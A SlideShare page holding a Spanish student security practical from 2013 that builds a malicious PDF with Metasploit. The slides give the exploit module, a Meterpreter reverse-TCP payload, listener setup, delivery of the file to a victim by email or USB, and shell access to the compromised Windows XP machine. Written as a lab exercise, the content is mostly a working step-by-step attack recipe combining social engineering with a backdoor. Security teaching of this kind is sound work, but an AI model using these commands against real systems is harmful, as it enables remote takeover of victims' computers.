SlideShare ist ein Scribd-Unternehmen logo
1 von 4
Downloaden Sie, um offline zu lesen
ATAQUE PDF
Eduard Angrill
Práctica de seguridad, donde se realiza un ataque por
ingeniería social en combinación con un troyano o
backdoor.

SEGURIDAD Y ALTA
DISPONIBILIDAD
STUCOM
20/11/2013
Introducción:
En esta práctica mediante un PDF infectado abriremos un puerto de escucha en un equipo Windows
XP que debe tener la versión 9 de Adobe PDF o una inferior, en versiones superiores el error que nos
permite abrir el puerto ya está corregido y accederemos a su sistema.
Back Track

Al Omitir los riegos

Víctima

Petición TCP Puerto: 4444

Paso 1:
Crear el fichero PDF mediante el programa "msfconsole" de Backtrack v5.

Usa un exploit de Windows adobe pdf:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Incluye el payload "reverse_tcp" (para una conexión "invertida" de tcp):
set payload windows/meterpreter/reverse_tcp
Añade la dirección del local host, el nombre del fichero y genera el exploit:
set lhost 192.168.72.200
set filename Xllegir.pdf
exploit

2
Paso 2:

Una vez el fichero ya está creado podemos acceder a él mediante la siguiente ruta:
/root/.msf4/local/Xllegir.pdf

Ahora tenemos que activar un servicio de escucha para recibir las peticiones de conexión invertidas,
para cuando la víctima abra el PDF y acepte el aviso de PDF potencialmente peligroso:

En este caso hacemos uso del exploit "handler":
use exploit/multi/handler
Le añadimos el payload de "reverse_tcp" para indicar el modo de recepción:
set payload windows/meterpreter/reverse_tcp
Y añadimos la IP del host local:
set lhost 192.168.1.3
exploit
Mensaje: "Starting the payload handler..." hasta que el usuario abra el PDF y reciba la conexión.

3
Ahora se tiene que pasar el PDF a la victima mediante un correo o USB:

Ahora está en modo de escucha hasta que el usuario victima ejecute el PDF omitiendo las
advertencias que le realiza el propio Adobe y finalmente se conecte con el servidor:

1.

2.

3.

1. Como se puede ver la víctima "192.168.72.201" se ha conectado mediante el puerto 4444
(un puerto de Windows que siempre está abierto).
2. sysinfo: para ver la información del sistema.
3. shell: abre un terminal dentro del equipo infectado.
4

Weitere ähnliche Inhalte

Andere mochten auch

Weight Management & Body Image Week 8
Weight Management & Body Image Week 8Weight Management & Body Image Week 8
Weight Management & Body Image Week 8mwalsh2015
 
Alitara dossier v final
Alitara dossier v finalAlitara dossier v final
Alitara dossier v finalMunts Puig
 
Directorio nacional de asociaciones de ayuda
Directorio nacional de asociaciones de ayudaDirectorio nacional de asociaciones de ayuda
Directorio nacional de asociaciones de ayudak4rol1n4
 
El Teléfono Móvil como Herramienta educativa
El Teléfono Móvil como Herramienta educativaEl Teléfono Móvil como Herramienta educativa
El Teléfono Móvil como Herramienta educativamvercolas
 
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePoint
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePointGlobal SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePoint
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePointGeoff Varosky
 
Sistema de motivación por puntos
Sistema de motivación por puntosSistema de motivación por puntos
Sistema de motivación por puntosprofesor0323
 
Ingles diversificada
Ingles diversificadaIngles diversificada
Ingles diversificadaJosh Valerin
 
Energia eléctrica.
Energia eléctrica.Energia eléctrica.
Energia eléctrica.Mari Lucero
 
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014Centre for Executive Education
 
Texto instructivo la tortilla francesa
Texto instructivo la tortilla francesaTexto instructivo la tortilla francesa
Texto instructivo la tortilla francesakontakatiluak6a12
 
SHA-ProjectsLibrary_FOM-ZenicaBlock
SHA-ProjectsLibrary_FOM-ZenicaBlockSHA-ProjectsLibrary_FOM-ZenicaBlock
SHA-ProjectsLibrary_FOM-ZenicaBlockRen Knupfer
 
Los Verdiales
Los VerdialesLos Verdiales
Los Verdialeskarmenba
 
Pertinencia de los estudios de cata y degustación para la definición de la ca...
Pertinencia de los estudios de cata y degustación para la definición de la ca...Pertinencia de los estudios de cata y degustación para la definición de la ca...
Pertinencia de los estudios de cata y degustación para la definición de la ca...ExternalEvents
 
ENX Magazine_Difference Makers 16 May
ENX Magazine_Difference Makers 16 MayENX Magazine_Difference Makers 16 May
ENX Magazine_Difference Makers 16 MayLarry Levine
 

Andere mochten auch (20)

San Clemente News 2-3-2012 edition
San Clemente News 2-3-2012 editionSan Clemente News 2-3-2012 edition
San Clemente News 2-3-2012 edition
 
Weight Management & Body Image Week 8
Weight Management & Body Image Week 8Weight Management & Body Image Week 8
Weight Management & Body Image Week 8
 
Alitara dossier v final
Alitara dossier v finalAlitara dossier v final
Alitara dossier v final
 
Directorio nacional de asociaciones de ayuda
Directorio nacional de asociaciones de ayudaDirectorio nacional de asociaciones de ayuda
Directorio nacional de asociaciones de ayuda
 
Total-Retail-Global-Report 2016
Total-Retail-Global-Report 2016Total-Retail-Global-Report 2016
Total-Retail-Global-Report 2016
 
El Teléfono Móvil como Herramienta educativa
El Teléfono Móvil como Herramienta educativaEl Teléfono Móvil como Herramienta educativa
El Teléfono Móvil como Herramienta educativa
 
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePoint
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePointGlobal SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePoint
Global SharePoint Users Group 1/5/10 - Creating Custom Actions Within SharePoint
 
proteinas
proteinasproteinas
proteinas
 
Sistema de motivación por puntos
Sistema de motivación por puntosSistema de motivación por puntos
Sistema de motivación por puntos
 
Ingles diversificada
Ingles diversificadaIngles diversificada
Ingles diversificada
 
Energia eléctrica.
Energia eléctrica.Energia eléctrica.
Energia eléctrica.
 
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014
CEE 2014 Executive Briefing - Learn@lunch Series - 2 April 2014
 
Crónicas de un zombie =)
Crónicas de un zombie  =)Crónicas de un zombie  =)
Crónicas de un zombie =)
 
Texto instructivo la tortilla francesa
Texto instructivo la tortilla francesaTexto instructivo la tortilla francesa
Texto instructivo la tortilla francesa
 
SHA-ProjectsLibrary_FOM-ZenicaBlock
SHA-ProjectsLibrary_FOM-ZenicaBlockSHA-ProjectsLibrary_FOM-ZenicaBlock
SHA-ProjectsLibrary_FOM-ZenicaBlock
 
Writing articles 011014
Writing articles 011014Writing articles 011014
Writing articles 011014
 
Los Verdiales
Los VerdialesLos Verdiales
Los Verdiales
 
Pertinencia de los estudios de cata y degustación para la definición de la ca...
Pertinencia de los estudios de cata y degustación para la definición de la ca...Pertinencia de los estudios de cata y degustación para la definición de la ca...
Pertinencia de los estudios de cata y degustación para la definición de la ca...
 
Portafolio 2013
Portafolio 2013Portafolio 2013
Portafolio 2013
 
ENX Magazine_Difference Makers 16 May
ENX Magazine_Difference Makers 16 MayENX Magazine_Difference Makers 16 May
ENX Magazine_Difference Makers 16 May
 

Ähnlich wie Seguridad: Backtrack1

Instalación y configuración vpn
Instalación y configuración vpnInstalación y configuración vpn
Instalación y configuración vpnFerney Soler
 
Troyano little witch
Troyano little witchTroyano little witch
Troyano little witchjop316
 
Tutorial de protocolos udp,tcp,sctp
Tutorial de protocolos udp,tcp,sctpTutorial de protocolos udp,tcp,sctp
Tutorial de protocolos udp,tcp,sctpJavier Acosta Alfaro
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesVictor Jaimes
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remotaJavier Muñoz
 
Practica seis - herramientas de comunicación en red
Practica seis - herramientas de comunicación en redPractica seis - herramientas de comunicación en red
Practica seis - herramientas de comunicación en redErick Cruz
 
Analisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpAnalisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpJavier Martin Rivero
 
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdf
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdfADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdf
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdfRafaelPusda
 
Proyecto 2 "Seguridad Informática"
Proyecto 2 "Seguridad Informática" Proyecto 2 "Seguridad Informática"
Proyecto 2 "Seguridad Informática" LukinhaLA
 
Ser Referente Tecnológico en la escuela. Prof. Miriam L. Porta
Ser Referente Tecnológico en la escuela. Prof. Miriam L. PortaSer Referente Tecnológico en la escuela. Prof. Miriam L. Porta
Ser Referente Tecnológico en la escuela. Prof. Miriam L. Portammllpp
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3Antonio Durán
 
#opendatasev Un caso practico de extraccion y exposición de datos
#opendatasev Un caso practico de extraccion y exposición de datos#opendatasev Un caso practico de extraccion y exposición de datos
#opendatasev Un caso practico de extraccion y exposición de datosIldefonso Montero Pérez
 
Taller: Mi primer Firewall
Taller: Mi primer FirewallTaller: Mi primer Firewall
Taller: Mi primer FirewallGabriel Orozco
 
Nivel de transporte
Nivel de transporteNivel de transporte
Nivel de transportearturogv
 

Ähnlich wie Seguridad: Backtrack1 (20)

Instalación y configuración vpn
Instalación y configuración vpnInstalación y configuración vpn
Instalación y configuración vpn
 
Endpoint practica de redes
Endpoint practica de redesEndpoint practica de redes
Endpoint practica de redes
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Troyano little witch
Troyano little witchTroyano little witch
Troyano little witch
 
Tutorial de protocolos udp,tcp,sctp
Tutorial de protocolos udp,tcp,sctpTutorial de protocolos udp,tcp,sctp
Tutorial de protocolos udp,tcp,sctp
 
13proftpd
13proftpd13proftpd
13proftpd
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimes
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
 
Practica seis - herramientas de comunicación en red
Practica seis - herramientas de comunicación en redPractica seis - herramientas de comunicación en red
Practica seis - herramientas de comunicación en red
 
Analisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpAnalisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y Tcpdump
 
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdf
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdfADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdf
ADMINISTACIÓN AVANZADA DE SERVIDORES_Rafael Pusda.pdf
 
Proyecto 2 "Seguridad Informática"
Proyecto 2 "Seguridad Informática" Proyecto 2 "Seguridad Informática"
Proyecto 2 "Seguridad Informática"
 
Ser Referente Tecnológico en la escuela. Prof. Miriam L. Porta
Ser Referente Tecnológico en la escuela. Prof. Miriam L. PortaSer Referente Tecnológico en la escuela. Prof. Miriam L. Porta
Ser Referente Tecnológico en la escuela. Prof. Miriam L. Porta
 
Servidor FTP en CentOS 6.5
Servidor FTP en CentOS 6.5Servidor FTP en CentOS 6.5
Servidor FTP en CentOS 6.5
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Curso Basico Ponencia 3
Curso Basico Ponencia 3Curso Basico Ponencia 3
Curso Basico Ponencia 3
 
Http net gui preguntas y soluciones
Http net gui preguntas y solucionesHttp net gui preguntas y soluciones
Http net gui preguntas y soluciones
 
#opendatasev Un caso practico de extraccion y exposición de datos
#opendatasev Un caso practico de extraccion y exposición de datos#opendatasev Un caso practico de extraccion y exposición de datos
#opendatasev Un caso practico de extraccion y exposición de datos
 
Taller: Mi primer Firewall
Taller: Mi primer FirewallTaller: Mi primer Firewall
Taller: Mi primer Firewall
 
Nivel de transporte
Nivel de transporteNivel de transporte
Nivel de transporte
 

Mehr von Francesc Perez

Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPFrancesc Perez
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónFrancesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Francesc Perez
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solFrancesc Perez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorFrancesc Perez
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3Francesc Perez
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicasFrancesc Perez
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleFrancesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleFrancesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaFrancesc Perez
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación Francesc Perez
 

Mehr von Francesc Perez (20)

ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode Solución
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
 html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
 

Seguridad: Backtrack1

  • 1. ATAQUE PDF Eduard Angrill Práctica de seguridad, donde se realiza un ataque por ingeniería social en combinación con un troyano o backdoor. SEGURIDAD Y ALTA DISPONIBILIDAD STUCOM 20/11/2013
  • 2. Introducción: En esta práctica mediante un PDF infectado abriremos un puerto de escucha en un equipo Windows XP que debe tener la versión 9 de Adobe PDF o una inferior, en versiones superiores el error que nos permite abrir el puerto ya está corregido y accederemos a su sistema. Back Track Al Omitir los riegos Víctima Petición TCP Puerto: 4444 Paso 1: Crear el fichero PDF mediante el programa "msfconsole" de Backtrack v5. Usa un exploit de Windows adobe pdf: use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs Incluye el payload "reverse_tcp" (para una conexión "invertida" de tcp): set payload windows/meterpreter/reverse_tcp Añade la dirección del local host, el nombre del fichero y genera el exploit: set lhost 192.168.72.200 set filename Xllegir.pdf exploit 2
  • 3. Paso 2: Una vez el fichero ya está creado podemos acceder a él mediante la siguiente ruta: /root/.msf4/local/Xllegir.pdf Ahora tenemos que activar un servicio de escucha para recibir las peticiones de conexión invertidas, para cuando la víctima abra el PDF y acepte el aviso de PDF potencialmente peligroso: En este caso hacemos uso del exploit "handler": use exploit/multi/handler Le añadimos el payload de "reverse_tcp" para indicar el modo de recepción: set payload windows/meterpreter/reverse_tcp Y añadimos la IP del host local: set lhost 192.168.1.3 exploit Mensaje: "Starting the payload handler..." hasta que el usuario abra el PDF y reciba la conexión. 3
  • 4. Ahora se tiene que pasar el PDF a la victima mediante un correo o USB: Ahora está en modo de escucha hasta que el usuario victima ejecute el PDF omitiendo las advertencias que le realiza el propio Adobe y finalmente se conecte con el servidor: 1. 2. 3. 1. Como se puede ver la víctima "192.168.72.201" se ha conectado mediante el puerto 4444 (un puerto de Windows que siempre está abierto). 2. sysinfo: para ver la información del sistema. 3. shell: abre un terminal dentro del equipo infectado. 4